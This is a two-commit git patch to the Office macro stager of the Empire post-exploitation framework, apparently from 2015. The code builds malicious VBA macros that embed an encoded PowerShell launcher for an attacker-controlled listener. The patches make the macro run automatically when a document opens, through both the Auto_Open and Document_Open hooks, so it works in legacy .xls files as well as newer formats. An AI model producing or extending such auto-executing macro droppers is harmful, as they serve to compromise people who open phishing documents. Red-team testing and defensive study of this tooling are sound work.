From 3b8d18a41ed344d4c70566ef223ac4b2a1af0fac Mon Sep 17 00:00:00 2001 From: Jeff McCutchan Date: Wed, 14 Oct 2015 17:08:43 -0400 Subject: [PATCH 1/2] Added "LegacyMacro" option which creates a macro compatible with Office 97-2003 documents. --- lib/stagers/macro.py | 11 ++++++++++- 1 file changed, 10 insertions(+), 1 deletion(-) diff --git a/lib/stagers/macro.py b/lib/stagers/macro.py index d315b80..ddf847f 100644 --- a/lib/stagers/macro.py +++ b/lib/stagers/macro.py @@ -44,6 +44,11 @@ class Stager: 'Description' : 'Proxy credentials ([domain\]username:password) to use for request (default, none, or other).', 'Required' : False, 'Value' : 'default' + }, + 'LegacyMacro' : { + 'Description' : 'Generate macro compatible with office 97-2003 documents so a ".xls" extension can be used (True or False).', + 'Required' : True, + 'Value' : 'False' } } @@ -65,6 +70,7 @@ class Stager: userAgent = self.options['UserAgent']['Value'] proxy = self.options['Proxy']['Value'] proxyCreds = self.options['ProxyCreds']['Value'] + legacyMacro = self.options['LegacyMacro']['Value'] # generate the launcher code launcher = self.mainMenu.stagers.generate_launcher(listenerName, encode=True, userAgent=userAgent, proxy=proxy, proxyCreds=proxyCreds) @@ -79,7 +85,10 @@ class Stager: for chunk in chunks[1:]: payload += "\tstr = str + \"" + str(chunk) + "\"\n" - macro = "Sub Document_Open()\n" + if legacyMacro == 'True': + macro = "Sub Auto_Open()\n" + else: + macro = "Sub Document_Open()\n" macro += "\tDebugging\n" macro += "End Sub\n\n" From eb779309d2a58d17c59e1f57266270d87d243495 Mon Sep 17 00:00:00 2001 From: Jeff McCutchan Date: Thu, 15 Oct 2015 14:24:42 -0400 Subject: [PATCH 2/2] Changed the macro to support both file types --- lib/stagers/macro.py | 16 +++++----------- 1 file changed, 5 insertions(+), 11 deletions(-) diff --git a/lib/stagers/macro.py b/lib/stagers/macro.py index ddf847f..6c5e4a5 100644 --- a/lib/stagers/macro.py +++ b/lib/stagers/macro.py @@ -9,7 +9,7 @@ class Stager: 'Author': ['@enigma0x3', '@harmj0y'], - 'Description': ('Generates an office macro for Empire.'), + 'Description': ('Generates an office macro for Empire, compatible with office 97-2003, and 2007 file types.'), 'Comments': [ 'http://enigma0x3.wordpress.com/2014/01/11/using-a-powershell-payload-in-a-client-side-attack/' @@ -44,11 +44,6 @@ class Stager: 'Description' : 'Proxy credentials ([domain\]username:password) to use for request (default, none, or other).', 'Required' : False, 'Value' : 'default' - }, - 'LegacyMacro' : { - 'Description' : 'Generate macro compatible with office 97-2003 documents so a ".xls" extension can be used (True or False).', - 'Required' : True, - 'Value' : 'False' } } @@ -70,7 +65,6 @@ class Stager: userAgent = self.options['UserAgent']['Value'] proxy = self.options['Proxy']['Value'] proxyCreds = self.options['ProxyCreds']['Value'] - legacyMacro = self.options['LegacyMacro']['Value'] # generate the launcher code launcher = self.mainMenu.stagers.generate_launcher(listenerName, encode=True, userAgent=userAgent, proxy=proxy, proxyCreds=proxyCreds) @@ -85,10 +79,10 @@ class Stager: for chunk in chunks[1:]: payload += "\tstr = str + \"" + str(chunk) + "\"\n" - if legacyMacro == 'True': - macro = "Sub Auto_Open()\n" - else: - macro = "Sub Document_Open()\n" + macro = "Sub Auto_Open()\n" + macro += "\tDebugging\n" + macro += "End Sub\n\n" + macro += "Sub Document_Open()\n" macro += "\tDebugging\n" macro += "End Sub\n\n"